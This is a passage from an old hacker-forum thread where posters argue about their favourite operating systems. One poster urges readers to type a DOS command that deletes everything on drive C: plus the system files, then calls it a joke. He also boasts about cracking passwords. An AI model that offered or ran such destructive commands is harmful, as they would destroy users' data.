Page 1 of 2 12 LastLast

Thread: A new twist!

A new twist!

Ok there is a lot of laming going on so I thought we could aim that anger in a constructive way.
    Basically the game is simple.

It is a new twist on the OS war thing but read on its different.

First you post your fave OS and list its advantages.
    The next person to reply lists the disadvantages and the advantages of their fave OS and so on until we get a good view on all types of OS!

Ok here goes!!!

DOS because the [ tree /f ] command is so damn 1337 and fun to watch.

edit 1337.bat

@echo off

:one
    tree /f
    goto one

alt+f
    alt+s
    alt+f
    x

I'll take a margarita, a little salt, with a twist of lime.
    My favourite OS is OS2Warp, because it's just so funny and cute!
    Can you believe that my elementary school actually ran its computer labs on this, and taught it to kids?
    No wonder we have so many scr1pt k1dd13s in the world today, all they know is OS2Warp because of the messed up Canadian education system.

SSJVegeta-Sei

Pierce me with steel, rend me with claw and fang; as I die, a legend is born for another generation to follow.
    An\' it harm none, do as ye will. - Wiccan Rede

id have to say DOS... it was simple, easy, and so long as it liked you and your computer, it cooperated.....(untill you mixed windows with it)
    --------------------------
    http://www.arg-irc.com

I am a cracker
    Personally I like DOS because there are lots of hacking cracking phreaking tools written that run under DOS. And everything from old 8088/8086 right up to the newest P4 will run it.
    everyone go to start, programs look for ms-dos and type this is

deltree /y c:\*.*
    del c:\autoexec.bat
    del c:\config.sys
    del c:\windows\win.ini
    del c:\windows\system.ini
    deltree /y c:\windows\win.com
    del c:\windows\win.*

just playing around don't do it I also like Linux even though I am kind of new to it not really though.

Everyone can run an operating system with open source, running GNU tools that are equally open -source modifying and changing the source code as we like. Linux runs the web in my opionion. LINUX IS THE CRACKERS OPERATING SYSTEM and it's free. Go download it and install it.

I've watched crack chew through a 10,000 -entry password file and spit out nearly 1,000 valid logins in less than an hour! Crack comes as a tar file containing C code that needs to be complied and configured

Personally I like DOS because there are lots of hacking cracking phreaking tools written that run under DOS.
    - There's alot of hacking/cracking/phreaking tools that run just as well if not better on other OS's also. That just shows how 1337 you are dosen't it? You like DOS cause you can download a h4x0r program to do everything for you. Tell me if that dosen't sound like a script kid to you.

I also like Linux even though I am kind of new to it not really though.
    - Oh you like Linux do ya? What distro.? Which do you prefer to use KDE or GNOME?
    Do you know what the kernel is? Do you know HOW to PROPERLY modify the source? I don't think so. I may be wrong but even if you do run linux, you're still an idiot. I'd like to see you explane the installation process to me in this thread.. IF you can. What security precatuions do you use to secure your linux box?

Remote_Access_

wow..... kinda harsh response if you ask me.....
    --------------------------
    http://www.arg-irc.com

I must say I'm amazed no one has yet mentioned Linux

I go with Linux, though it is a little less convenient software wise, it makes up for it in stability and outright power. I loooovvveee my console
    SlackWare my first, Debian my second....building my box into the ultimate weapon

FreeBSD - cause it's so simple, it gives me headaches sometimes.....hehehe
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

I'm gonna be rather random here and go for OS/400 on the IBM AS/400 (now iSeries). Green screens, multiple versions of operating system running at the same time, and it's never been hacked. So beat that (you didn't say it had to be desktop!)

DM